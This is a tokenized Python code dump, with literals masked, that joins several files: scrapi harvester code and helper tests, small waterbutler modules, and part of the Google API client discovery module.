strftime ( '<STR_LIT>' ) <EOL> ) <EOL> records = self . get_records ( search_url ) <EOL> record_list = [ ] <EOL> for record in records : <EOL> doc_id = record [ '<STR_LIT:id>' ] <EOL> record_list . append ( <EOL> RawDocument ( <EOL> { <EOL> '<STR_LIT>' : json . dumps ( record ) , <EOL> '<STR_LIT:source>' : self . short_name , <EOL> '<STR_LIT>' : six . text_type ( doc_id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ) <EOL> ) <EOL> return record_list <EOL> def get_records ( self , search_url ) : <EOL> records = requests . get ( search_url ) . json ( ) [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) <EOL> offset = <NUM_LIT:1> <EOL> all_records = [ ] <EOL> while len ( records ) == <NUM_LIT> : <EOL> for record in records : <EOL> all_records . 
append ( record ) <EOL> offset += <NUM_LIT> <EOL> records = requests . get ( search_url + '<STR_LIT>' . format ( str ( offset ) ) , throttle = <NUM_LIT:3> ) . json ( ) [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) <EOL> all_records . extend ( records ) <EOL> return all_records </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from scrapi . base import OAIHarvester <EOL> class UCeScholarshipHarvester ( OAIHarvester ) : <EOL> short_name = '<STR_LIT>' <EOL> long_name = '<STR_LIT>' <EOL> url = '<STR_LIT>' <EOL> base_url = '<STR_LIT>' <EOL> property_list = [ <EOL> '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT:date>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:source>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] </s>
<s> from scrapi . linter . document import RawDocument , NormalizedDocument </s>
<s> import vcr <EOL> import mock <EOL> import pytest <EOL> from scrapi import requests <EOL> from scrapi . base import helpers <EOL> @ pytest . fixture ( autouse = True ) <EOL> def mock_maybe_load_response ( monkeypatch ) : <EOL> mock_mlr = mock . Mock ( ) <EOL> mock_mlr . return_value = None <EOL> mock_save = lambda x : x <EOL> monkeypatch . setattr ( requests , '<STR_LIT>' , mock_mlr ) <EOL> monkeypatch . setattr ( requests . HarvesterResponse , '<STR_LIT>' , mock_save ) <EOL> class TestHelpers ( object ) : <EOL> def test_format_one_tag ( self ) : <EOL> single_tag = '<STR_LIT>' <EOL> single_output = helpers . format_tags ( single_tag ) <EOL> assert single_output == [ '<STR_LIT>' ] <EOL> assert isinstance ( single_output , list ) <EOL> def test_format_many_tags ( self ) : <EOL> many_tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> many_output = helpers . format_tags ( many_tags ) <EOL> assert set ( many_output ) == set ( [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_format_sep_tags ( self ) : <EOL> sep_tags = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> sep_output = helpers . format_tags ( sep_tags , sep = '<STR_LIT:U+002C>' ) <EOL> assert set ( sep_output ) == set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_extract_dois ( self ) : <EOL> identifiers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> valid_dois = helpers . oai_extract_dois ( identifiers ) <EOL> assert valid_dois == [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> def oai_process_uris ( self ) : <EOL> identifiers = [ '<STR_LIT>' ] <EOL> with pytest . raises ( ValueError ) : <EOL> helpers . oai_extract_url ( identifiers ) <EOL> def test_extract_uris ( self ) : <EOL> identifiers = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> uri_dict = helpers . 
oai_process_uris ( identifiers ) <EOL> assert uri_dict == { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> def test_extract_uris_use_doi ( self ) : <EOL> identifiers = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> uri_dict = helpers . oai_process_uris ( identifiers , use_doi = True ) <EOL> assert uri_dict == { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> def test_process_contributors ( self ) : <EOL> args = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> response = helpers . oai_process_contributors ( args ) <EOL> assert isinstance ( response , list ) <EOL> @ vcr . use_cassette ( '<STR_LIT>' ) <EOL> def test_oai_get_records_and_token ( self ) : <EOL> url = '<STR_LIT>' <EOL> force = False <EOL> verify = True <EOL> throttle = <NUM_LIT:0.5> <EOL> namespaces = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> records , token = helpers . oai_get_records_and_token ( url , throttle , force , namespaces , verify ) <EOL> assert records <EOL> assert token <EOL> assert len ( records ) == <NUM_LIT:50> <EOL> def test_extract_doi_from_text ( self ) : <EOL> text = [ """<STR_LIT>""" ] <EOL> extracted_doi = helpers . extract_doi_from_text ( text ) <EOL> assert extracted_doi == '<STR_LIT>' <EOL> def test_gather_identifiers ( self ) : <EOL> identifiers = [ [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ] <EOL> gathered = helpers . 
gather_identifiers ( identifiers ) <EOL> assert gathered == [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def test_gather_object_uris ( self ) : <EOL> identifiers = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> object_uris = helpers . gather_object_uris ( identifiers ) <EOL> assert object_uris == [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> def test_seperate_provider_object_uris ( self ) : <EOL> identifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> provider_uris , object_uris = helpers . seperate_provider_object_uris ( identifiers ) <EOL> assert provider_uris == [ '<STR_LIT>' ] <EOL> assert object_uris == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def test_format_doi_as_url ( self ) : <EOL> doi1 = '<STR_LIT>' <EOL> doi2 = '<STR_LIT>' <EOL> assert helpers . format_doi_as_url ( doi1 ) == '<STR_LIT>' <EOL> assert helpers . format_doi_as_url ( doi2 ) == '<STR_LIT>' </s>
<s> from . handler import OsfAuthHandler </s>
<s> try : <EOL> from waterbutler import settings <EOL> except ImportError : <EOL> settings = { } <EOL> config = settings . get ( '<STR_LIT>' , { } ) <EOL> TEMP_URL_SECS = config . get ( '<STR_LIT>' , <NUM_LIT:100> ) <EOL> AUTH_URL = config . get ( '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from . provider import OSFStorageProvider <EOL> __version__ = OSFStorageProvider . __version__ </s>
<s> import tornado . web <EOL> import waterbutler <EOL> class StatusHandler ( tornado . web . RequestHandler ) : <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> self . write ( { <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : waterbutler . __version__ <EOL> } ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> import copy <EOL> from email . mime . multipart import MIMEMultipart <EOL> from email . mime . nonmultipart import MIMENonMultipart <EOL> import keyword <EOL> import logging <EOL> import mimetypes <EOL> import os <EOL> import re <EOL> import urllib <EOL> import urlparse <EOL> try : <EOL> from urlparse import parse_qsl <EOL> except ImportError : <EOL> from cgi import parse_qsl <EOL> import httplib2 <EOL> import mimeparse <EOL> import uritemplate <EOL> from apiclient . errors import HttpError <EOL> from apiclient . errors import InvalidJsonError <EOL> from apiclient . errors import MediaUploadSizeError <EOL> from apiclient . errors import UnacceptableMimeTypeError <EOL> from apiclient . errors import UnknownApiNameOrVersion <EOL> from apiclient . errors import UnknownFileType <EOL> from apiclient . http import HttpRequest <EOL> from apiclient . http import MediaFileUpload <EOL> from apiclient . http import MediaUpload <EOL> from apiclient . model import JsonModel <EOL> from apiclient . model import MediaModel <EOL> from apiclient . model import RawModel <EOL> from apiclient . schema import Schemas <EOL> from oauth2client . anyjson import simplejson <EOL> from oauth2client . util import _add_query_parameter <EOL> from oauth2client . util import positional <EOL> httplib2 . RETRIES = <NUM_LIT:1> <EOL> logger = logging . getLogger ( __name__ ) <EOL> URITEMPLATE = re . compile ( '<STR_LIT>' ) <EOL> VARNAME = re . 
compile ( '<STR_LIT>' ) <EOL> DISCOVERY_URI = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> DEFAULT_METHOD_DOC = '<STR_LIT>' <EOL> HTTP_PAYLOAD_METHODS = frozenset ( [ '<STR_LIT>' , '<STR_LIT:POST>' , '<STR_LIT>' ] ) <EOL> _MEDIA_SIZE_BIT_SHIFTS = { '<STR_LIT>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:20> , '<STR_LIT>' : <NUM_LIT:30> , '<STR_LIT>' : <NUM_LIT> } <EOL> BODY_PARAMETER_DEFAULT_VALUE = { <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT:object>' , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> MEDIA_BODY_PARAMETER_DEFAULT_VALUE = { <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> STACK_QUERY_PARAMETERS = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:strict>' ] ) <EOL> STACK_QUERY_PARAMETER_DEFAULT_VALUE = { '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT:location>' : '<STR_LIT>' } <EOL> RESERVED_WORDS = frozenset ( [ '<STR_LIT:body>' ] ) <EOL> def fix_method_name ( name ) : <EOL> """<STR_LIT>""" <EOL> if keyword . iskeyword ( name ) or name in RESERVED_WORDS : <EOL> return name + '<STR_LIT:_>' <EOL> else : <EOL> return name <EOL> def key2param ( key ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> key = list ( key ) <EOL> if not key [ <NUM_LIT:0> ] . isalpha ( ) : <EOL> result . append ( '<STR_LIT:x>' ) <EOL> for c in key : <EOL> if c . isalnum ( ) : <EOL> result . append ( c ) <EOL> else : <EOL> result . append ( '<STR_LIT:_>' ) <EOL> return '<STR_LIT>' . join ( result ) <EOL> @ positional ( <NUM_LIT:2> ) <EOL> def build ( serviceName , <EOL> version , <EOL> http = None , <EOL> discoveryServiceUrl = DISCOVERY_URI , <EOL> developerKey = None , <EOL> model = None , <EOL> requestBuilder = HttpRequest ) : <EOL> """<STR_LIT>""" <EOL> params = { <EOL> '<STR_LIT>' : serviceName , <EOL> '<STR_LIT>' : version <EOL> } <EOL> if http is None : <EOL> http = httplib2 . Http ( ) <EOL> requested_url = uritemplate . 
expand ( discoveryServiceUrl , params ) <EOL> if '<STR_LIT>' in os . environ : <EOL> requested_url = _add_query_parameter ( requested_url , '<STR_LIT>' , <EOL> os . environ [ '<STR_LIT>' ] ) <EOL> logger . info ( '<STR_LIT>' % requested_url ) <EOL> resp , content = http . request ( requested_url ) <EOL> if resp . status == <NUM_LIT> : <EOL> raise UnknownApiNameOrVersion ( "<STR_LIT>" % ( serviceName , <EOL> version ) ) <EOL> if resp . status >= <NUM_LIT> : <EOL> raise HttpError ( resp , content , uri = requested_url ) <EOL> try : <EOL> service = simplejson . loads ( content ) <EOL> except ValueError , e : <EOL> logger . error ( '<STR_LIT>' + content ) <EOL> raise InvalidJsonError ( ) <EOL> return build_from_document ( content , base = discoveryServiceUrl , http = http , <EOL> developerKey = developerKey , model = model , requestBuilder = requestBuilder ) <EOL> @ positional ( <NUM_LIT:1> ) <EOL> def build_from_document ( <EOL> service , <EOL> base = None , <EOL> future = None , <EOL> http = None , <EOL> developerKey = None , <EOL> model = None , <EOL> requestBuilder = HttpRequest ) : <EOL> """<STR_LIT>""" <EOL> future = { } <EOL> if isinstance ( service , basestring ) : <EOL> service = simplejson . loads ( service ) <EOL> base = urlparse . urljoin ( service [ '<STR_LIT>' ] , service [ '<STR_LIT>' ] ) <EOL> schema = Schemas ( service ) <EOL> if model is None : <EOL> features = service . 
get ( '<STR_LIT>' , [ ] ) <EOL> model = JsonModel ( '<STR_LIT>' in features ) <EOL> return Resource ( http = http , baseUrl = base , model = model , <EOL> developerKey = developerKey , requestBuilder = requestBuilder , <EOL> resourceDesc = service , rootDesc = service , schema = schema ) <EOL> def _cast ( value , schema_type ) : <EOL> """<STR_LIT>""" <EOL> if schema_type == '<STR_LIT:string>' : <EOL> if type ( value ) == type ( '<STR_LIT>' ) or type ( value ) == type ( u'<STR_LIT>' ) : <EOL> return value <EOL> else : <EOL> return str ( value ) <EOL> elif schema_type == '<STR_LIT>' : <EOL> return str ( int ( value ) ) <EOL> elif schema_type == '<STR_LIT>' : <EOL> return str ( float ( value ) ) <EOL> elif schema_type == '<STR_LIT>' : <EOL> return str ( bool ( value ) ) . lower ( ) <EOL> else : <EOL> if type ( value ) == type ( '<STR_LIT>' ) or type ( value ) == type ( u'<STR_LIT>' ) : <EOL> return value <EOL> else : <EOL> return str ( value ) <EOL> def _media_size_to_long ( maxSize ) : <EOL> """<STR_LIT>""" <EOL> if len ( maxSize ) < <NUM_LIT:2> : <EOL> return <NUM_LIT:0> L <EOL> units = maxSize [ - <NUM_LIT:2> : ] . upper ( ) <EOL> bit_shift = _MEDIA_SIZE_BIT_SHIFTS . get ( units ) <EOL> if bit_shift is not None : <EOL> return long ( maxSize [ : - <NUM_LIT:2> ] ) << bit_shift <EOL> else : <EOL> return long ( maxSize ) <EOL> def _media_path_url_from_info ( root_desc , path_url ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % { <EOL> '<STR_LIT:root>' : root_desc [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : root_desc [ '<STR_LIT>' ] , <EOL> '<STR_LIT:path>' : path_url , <EOL> } <EOL> def _fix_up_parameters ( method_desc , root_desc , http_method ) : <EOL> """<STR_LIT>""" <EOL> parameters = method_desc . setdefault ( '<STR_LIT>' , { } ) <EOL> for name , description in root_desc . get ( '<STR_LIT>' , { } ) . iteritems ( ) : <EOL> parameters [ name ] = description <EOL> for name in STACK_QUERY_PARAMETERS : <EOL> parameters [ name ] = STACK_QUERY_PARAMETER_DEFAULT_VALUE . 
copy ( ) <EOL> if http_method in HTTP_PAYLOAD_METHODS and '<STR_LIT>' in method_desc : <EOL> body = BODY_PARAMETER_DEFAULT_VALUE . copy ( ) <EOL> body . update ( method_desc [ '<STR_LIT>' ] ) <EOL> parameters [ '<STR_LIT:body>' ] = body <EOL> return parameters <EOL> def _fix_up_media_upload ( method_desc , root_desc , path_url , parameters ) : <EOL> """<STR_LIT>""" <EOL> media_upload = method_desc . get ( '<STR_LIT>' , { } ) <EOL> accept = media_upload . get ( '<STR_LIT>' , [ ] ) <EOL> max_size = _media_size_to_long ( media_upload . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> media_path_url = None <EOL> if media_upload : <EOL> media_path_url = _media_path_url_from_info ( root_desc , path_url ) <EOL> parameters [ '<STR_LIT>' ] = MEDIA_BODY_PARAMETER_DEFAULT_VALUE . copy ( ) <EOL> if '<STR_LIT:body>' in parameters : <EOL> parameters [ '<STR_LIT:body>' ] [ '<STR_LIT>' ] = False <EOL> return accept , max_size , media_path_url <EOL> def _fix_up_method_description ( method_desc , root_desc ) : <EOL> """<STR_LIT>""" <EOL> path_url = method_desc [ '<STR_LIT:path>' ] <EOL> http_method = method_desc [ '<STR_LIT>' ] <EOL> method_id = method_desc [ '<STR_LIT:id>' ] <EOL> parameters = _fix_up_parameters ( method_desc , root_desc , http_method ) <EOL> accept , max_size , media_path_url = _fix_up_media_upload ( <EOL> method_desc , root_desc , path_url , parameters ) <EOL> return path_url , http_method , method_id , accept , max_size , media_path_url <EOL> class ResourceMethodParameters ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , method_desc ) : <EOL> """<STR_LIT>""" <EOL> self . argmap = { } <EOL> self . required_params = [ ] <EOL> self . repeated_params = [ ] <EOL> self . pattern_params = { } <EOL> self . query_params = [ ] <EOL> self . path_params = set ( ) <EOL> self . param_types = { } <EOL> self . enum_params = { } <EOL> self . 
set_parameters ( method_desc ) <EOL> def set_parameters ( self , method_desc ) : <EOL> """<STR_LIT>""" <EOL> for arg , desc in method_desc . get ( '<STR_LIT>' , { } ) . iteritems ( ) : <EOL> param = key2param ( arg ) <EOL> self . argmap [ param ] = arg <EOL> if desc . get ( '<STR_LIT>' ) : <EOL> self . pattern_params [ param ] = desc [ '<STR_LIT>' ] <EOL> if desc . get ( '<STR_LIT>' ) : <EOL> self . enum_params [ param ] = desc [ '<STR_LIT>' ] <EOL> if desc . get ( '<STR_LIT>' ) : <EOL> self . required_params . append ( param ) <EOL> if desc . get ( '<STR_LIT>' ) : <EOL> self . repeated_params . append ( param ) <EOL> if desc . get ( '<STR_LIT:location>' ) == '<STR_LIT>' : <EOL> self . query_params . append ( param ) <EOL> if desc . get ( '<STR_LIT:location>' ) == '<STR_LIT:path>' : <EOL> self . path_params . add ( param ) <EOL> self . param_types [ param ] = desc . get ( '<STR_LIT:type>' , '<STR_LIT:string>' ) <EOL> for match in URITEMPLATE . finditer ( method_desc [ '<STR_LIT:path>' ] ) : <EOL> for namematch in VARNAME . finditer ( match . group ( <NUM_LIT:0> ) ) : <EOL> name = key2param ( namematch . group ( <NUM_LIT:0> ) ) <EOL> self . path_params . add ( name ) <EOL> if name in self . query_params : <EOL> self . query_params . remove ( name ) <EOL> def createMethod ( methodName , methodDesc , rootDesc , schema ) : <EOL> """<STR_LIT>""" <EOL> methodName = fix_method_name ( methodName ) <EOL> ( pathUrl , httpMethod , methodId , accept , <EOL> maxSize , mediaPathUrl ) = _fix_up_method_description ( methodDesc , rootDesc ) <EOL> parameters = ResourceMethodParameters ( methodDesc ) <EOL> def method ( self , ** kwargs ) : <EOL> for name in kwargs . iterkeys ( ) : <EOL> if name not in parameters . argmap : <EOL> raise TypeError ( '<STR_LIT>' % name ) <EOL> keys = kwargs . keys ( ) <EOL> for name in keys : <EOL> if kwargs [ name ] is None : <EOL> del kwargs [ name ] <EOL> for name in parameters . 
required_params : <EOL> if name not in kwargs : <EOL> raise TypeError ( '<STR_LIT>' % name ) <EOL> for name , regex in parameters . pattern_params . iteritems ( ) : <EOL> if name in kwargs : <EOL> if isinstance ( kwargs [ name ] , basestring ) : <EOL> pvalues = [ kwargs [ name ] ] <EOL> else : <EOL> pvalues = kwargs [ name ] <EOL> for pvalue in pvalues : <EOL> if re . match ( regex , pvalue ) is None : <EOL> raise TypeError ( <EOL> '<STR_LIT>' % <EOL> ( name , pvalue , regex ) ) <EOL> for name , enums in parameters . enum_params . iteritems ( ) : <EOL> if name in kwargs : <EOL> if ( name in parameters . repeated_params and <EOL> not isinstance ( kwargs [ name ] , basestring ) ) : <EOL> values = kwargs [ name ] <EOL> else : <EOL> values = [ kwargs [ name ] ] <EOL> for value in values : <EOL> if value not in enums : <EOL> raise TypeError ( <EOL> '<STR_LIT>' % <EOL> ( name , value , str ( enums ) ) ) <EOL> actual_query_params = { } <EOL> actual_path_params = { } <EOL> for key , value in kwargs . iteritems ( ) : <EOL> to_type = parameters . param_types . get ( key , '<STR_LIT:string>' ) <EOL> if key in parameters . repeated_params and type ( value ) == type ( [ ] ) : <EOL> cast_value = [ _cast ( x , to_type ) for x in value ] <EOL> else : <EOL> cast_value = _cast ( value , to_type ) <EOL> if key in parameters . query_params : <EOL> actual_query_params [ parameters . argmap [ key ] ] = cast_value <EOL> if key in parameters . path_params : <EOL> actual_path_params [ parameters . argmap [ key ] ] = cast_value <EOL> body_value = kwargs . get ( '<STR_LIT:body>' , None ) <EOL> media_filename = kwargs . get ( '<STR_LIT>' , None ) <EOL> if self . _developerKey : <EOL> actual_query_params [ '<STR_LIT:key>' ] = self . _developerKey <EOL> model = self . _model <EOL> if methodName . endswith ( '<STR_LIT>' ) : <EOL> model = MediaModel ( ) <EOL> elif '<STR_LIT>' not in methodDesc : <EOL> model = RawModel ( ) <EOL> headers = { } <EOL> headers , params , query , body = model . 
request ( headers , <EOL> actual_path_params , actual_query_params , body_value ) <EOL> expanded_url = uritemplate . expand ( pathUrl , params ) <EOL> url = urlparse . urljoin ( self . _baseUrl , expanded_url + query ) <EOL> resumable = None <EOL> multipart_boundary = '<STR_LIT>' <EOL> if media_filename : <EOL> if isinstance ( media_filename , basestring ) : <EOL> ( media_mime_type , encoding ) = mimetypes . guess_type ( media_filename ) <EOL> if media_mime_type is None : <EOL> raise UnknownFileType ( media_filename ) <EOL> if not mimeparse . best_match ( [ media_mime_type ] , '<STR_LIT:U+002C>' . join ( accept ) ) : <EOL> raise UnacceptableMimeTypeError ( media_mime_type ) <EOL> media_upload = MediaFileUpload ( media_filename , <EOL> mimetype = media_mime_type ) <EOL> elif isinstance ( media_filename , MediaUpload ) : <EOL> media_upload = media_filename <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if maxSize > <NUM_LIT:0> and media_upload . size ( ) > maxSize : <EOL> raise MediaUploadSizeError ( "<STR_LIT>" % maxSize ) <EOL> expanded_url = uritemplate . expand ( mediaPathUrl , params ) <EOL> url = urlparse . urljoin ( self . _baseUrl , expanded_url + query ) <EOL> if media_upload . resumable ( ) : <EOL> url = _add_query_parameter ( url , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if media_upload . resumable ( ) : <EOL> resumable = media_upload <EOL> else : <EOL> if body is None : <EOL> headers [ '<STR_LIT>' ] = media_upload . mimetype ( ) <EOL> body = media_upload . getbytes ( <NUM_LIT:0> , media_upload . size ( ) ) <EOL> url = _add_query_parameter ( url , '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> msgRoot = MIMEMultipart ( '<STR_LIT>' ) <EOL> setattr ( msgRoot , '<STR_LIT>' , lambda self : None ) <EOL> msg = MIMENonMultipart ( * headers [ '<STR_LIT>' ] . split ( '<STR_LIT:/>' ) ) <EOL> msg . set_payload ( body ) <EOL> msgRoot . attach ( msg ) <EOL> msg = MIMENonMultipart ( * media_upload . mimetype ( ) . 
split ( '<STR_LIT:/>' ) ) <EOL> msg [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> payload = media_upload . getbytes ( <NUM_LIT:0> , media_upload . size ( ) ) <EOL> msg . set_payload ( payload ) <EOL> msgRoot . attach ( msg ) <EOL> body = msgRoot . as_string ( ) <EOL> multipart_boundary = msgRoot . get_boundary ( ) <EOL> headers [ '<STR_LIT>' ] = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % multipart_boundary <EOL> url = _add_query_parameter ( url , '<STR_LIT>' , '<STR_LIT>' ) <EOL> logger . info ( '<STR_LIT>' % url ) <EOL> return self . _requestBuilder ( self . _http , <EOL> model . response , <EOL> url , <EOL> method = httpMethod , <EOL> body = body , <EOL> headers = headers , <EOL> methodId = methodId , <EOL> resumable = resumable ) <EOL> docs = [ methodDesc . get ( '<STR_LIT:description>' , DEFAULT_METHOD_DOC ) , '<STR_LIT>' ] <EOL> if len ( parameters . argmap ) > <NUM_LIT:0> : <EOL> docs . append ( '<STR_LIT>' ) <EOL> skip_parameters = rootDesc . get ( '<STR_LIT>' , { } ) . keys ( ) <EOL> skip_parameters . extend ( STACK_QUERY_PARAMETERS ) <EOL> all_args = parameters . argmap . keys ( ) <EOL> args_ordered = [ key2param ( s ) for s in methodDesc . get ( '<STR_LIT>' , [ ] ) ] <EOL> if '<STR_LIT:body>' in all_args : <EOL> args_ordered . append ( '<STR_LIT:body>' ) <EOL> for name in all_args : <EOL> if name not in args_ordered : <EOL> args_ordered . append ( name ) <EOL> for arg in args_ordered : <EOL> if arg in skip_parameters : <EOL> continue <EOL> repeated = '<STR_LIT>' <EOL> if arg in parameters . repeated_params : <EOL> repeated = '<STR_LIT>' <EOL> required = '<STR_LIT>' <EOL> if arg in parameters . required_params : <EOL> required = '<STR_LIT>' <EOL> paramdesc = methodDesc [ '<STR_LIT>' ] [ parameters . argmap [ arg ] ] <EOL> paramdoc = paramdesc . get ( '<STR_LIT:description>' , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in paramdesc : <EOL> docs . append ( <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % ( arg , paramdoc , required , repeated , <EOL> schema . 
prettyPrintByName ( paramdesc [ '<STR_LIT>' ] ) ) ) <EOL> else : <EOL> paramtype = paramdesc . get ( '<STR_LIT:type>' , '<STR_LIT:string>' ) <EOL> docs . append ( '<STR_LIT>' % ( arg , paramtype , paramdoc , required , <EOL> repeated ) ) <EOL> enum = paramdesc . get ( '<STR_LIT>' , [ ] ) <EOL> enumDesc = paramdesc . get ( '<STR_LIT>' , [ ] ) <EOL> if enum and enumDesc : <EOL> docs . append ( '<STR_LIT>' ) <EOL> for ( name , desc ) in zip ( enum , enumDesc ) : <EOL> docs . append ( '<STR_LIT>' % ( name , desc ) ) <EOL> if '<STR_LIT>' in methodDesc : <EOL> if methodName . endswith ( '<STR_LIT>' ) : <EOL> docs . append ( '<STR_LIT>' ) <EOL> else : <EOL> docs . append ( '<STR_LIT>' ) <EOL> docs . append ( schema . prettyPrintSchema ( methodDesc [ '<STR_LIT>' ] ) ) <EOL> setattr ( method , '<STR_LIT>' , '<STR_LIT>' . join ( docs ) ) <EOL> return ( methodName , method ) <EOL> def createNextMethod ( methodName ) : <EOL> """<STR_LIT>""" <EOL> methodName = fix_method_name ( methodName ) <EOL> def methodNext ( self , previous_request , previous_response ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in previous_response : <EOL> return None <EOL> request = copy . copy ( previous_request ) <EOL> pageToken = previous_response [ '<STR_LIT>' ] <EOL> parsed = list ( urlparse . urlparse ( request . uri ) ) <EOL> q = parse_qsl ( parsed [ <NUM_LIT:4> ] ) <EOL> newq = [ ( key , value ) for ( key , value ) in q if key != '<STR_LIT>' ] <EOL> newq . append ( ( '<STR_LIT>' , pageToken ) ) <EOL> parsed [ <NUM_LIT:4> ] = urllib . urlencode ( newq ) <EOL> uri = urlparse . urlunparse ( parsed ) <EOL> request . uri = uri <EOL> logger . info ( '<STR_LIT>' % uri ) <EOL> return request <EOL> return ( methodName , methodNext ) <EOL> class Resource ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , http , baseUrl , model , requestBuilder , developerKey , <EOL> resourceDesc , rootDesc , schema ) : <EOL> """<STR_LIT>""" <EOL> self . _dynamic_attrs = [ ] <EOL> self . 
_http = http <EOL> self . _baseUrl = baseUrl <EOL> self . _model = model <EOL> self . _developerKey = developerKey <EOL> self . _requestBuilder = requestBuilder <EOL> self . _resourceDesc = resourceDesc <EOL> self . _rootDesc = rootDesc <EOL> self . _schema = schema <EOL> self . _set_service_methods ( ) <EOL> def _set_dynamic_attr ( self , attr_name , value ) : <EOL> """<STR_LIT>""" <EOL> self . _dynamic_attrs . append ( attr_name ) <EOL> self . __dict__ [ attr_name ] = value <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> state_dict = copy . copy ( self . __dict__ ) <EOL> for dynamic_attr in self . _dynamic_attrs : <EOL> del state_dict [ dynamic_attr ] <EOL> del state_dict [ '<STR_LIT>' ] <EOL> return state_dict <EOL> def __setstate__ ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( state ) <EOL> self . _dynamic_attrs = [ ] <EOL> self . _set_service_methods ( ) <EOL> def _set_service_methods ( self ) : <EOL> self . _add_basic_methods ( self . _resourceDesc , self . _rootDesc , self . _schema ) <EOL> self . _add_nested_resources ( self . _resourceDesc , self . _rootDesc , self . _schema ) <EOL> self . _add_next_methods ( self . _resourceDesc , self . _schema ) <EOL> def _add_basic_methods ( self , resourceDesc , rootDesc , schema ) : <EOL> if '<STR_LIT>' in resourceDesc : <EOL> for methodName , methodDesc in resourceDesc [ '<STR_LIT>' ] . iteritems ( ) : <EOL> fixedMethodName , method = createMethod ( <EOL> methodName , methodDesc , rootDesc , schema ) <EOL> self . _set_dynamic_attr ( fixedMethodName , <EOL> method . __get__ ( self , self . __class__ ) ) <EOL> if methodDesc . get ( '<STR_LIT>' , False ) : <EOL> fixedMethodName , method = createMethod ( <EOL> methodName + '<STR_LIT>' 